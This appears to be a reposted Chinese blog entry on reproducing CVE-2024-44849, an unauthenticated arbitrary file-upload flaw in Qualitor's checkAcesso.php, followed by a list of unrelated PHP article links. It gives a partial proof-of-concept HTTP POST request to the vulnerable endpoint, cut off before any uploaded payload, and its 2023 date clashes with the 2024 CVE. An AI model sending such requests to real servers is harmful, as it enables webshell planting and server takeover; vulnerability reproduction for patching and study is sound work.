博客
关于我
Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)
阅读量:794 次
发布时间:2023-03-03

本文共 591 字,大约阅读时间需要 1 分钟。

0x01 漏洞概述

Qualitor 8.24及之前版本存在严重的文件上传漏洞,这个漏洞未经身份验证,攻击者可利用此漏洞执行代码,创建WebShell,进一步控制服务器权限。该漏洞属于高风险级别,建议及时修复。

0x02 复现环境

此漏洞已被确认在以下环境中存在: - **Product Name**: Qualitor-Web - **Version Affected**: 8.24及之前版本

0x03 漏洞复现

以下是漏洞的PoC(Proof of Concept)代码,用于验证和分析: ```http POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849----------------------------- Content-Disposition: form-data; name="idtipo"2 ----------------------------- Content-Disposition: form-data; name="nmfilestorage" -

转载地址:http://wuxfk.baihongyu.com/

你可能感兴趣的文章
PHP实现微信公众号H5支付
查看>>
PHP实现微信公众号网页授权
查看>>
PHP实现微信小程序推送消息至公众号
查看>>
php实现根据身份证获取年龄
查看>>
PHP实现的MongoDB数据增删改查
查看>>
RabbitMQ连接报错(1)—— None of the specified endpoints were reachable
查看>>
php实现逆转数组
查看>>
PHP实现通过geoip获取IP地理信息
查看>>
PHP实现页面静态化、纯静态化及伪静态化
查看>>
PHP对表单提交特殊字符的过滤和处理
查看>>
php对象引用和析构函数的关系
查看>>
RabbitMQ HTTP 认证后端项目常见问题解决方案
查看>>
PHP将图片转换成base64格式(优缺点)
查看>>
php将多个值的数组去除重复元素
查看>>
php局域网上传文件_PHP如何通过CURL上传文件
查看>>
PHP工具插件大全
查看>>
php布尔值的++
查看>>
PHP常量、变量作用域详解(一)
查看>>
PHP应用目录结构设计
查看>>
PHP应用程序连接MSQL数据库Demo(附crud程序)
查看>>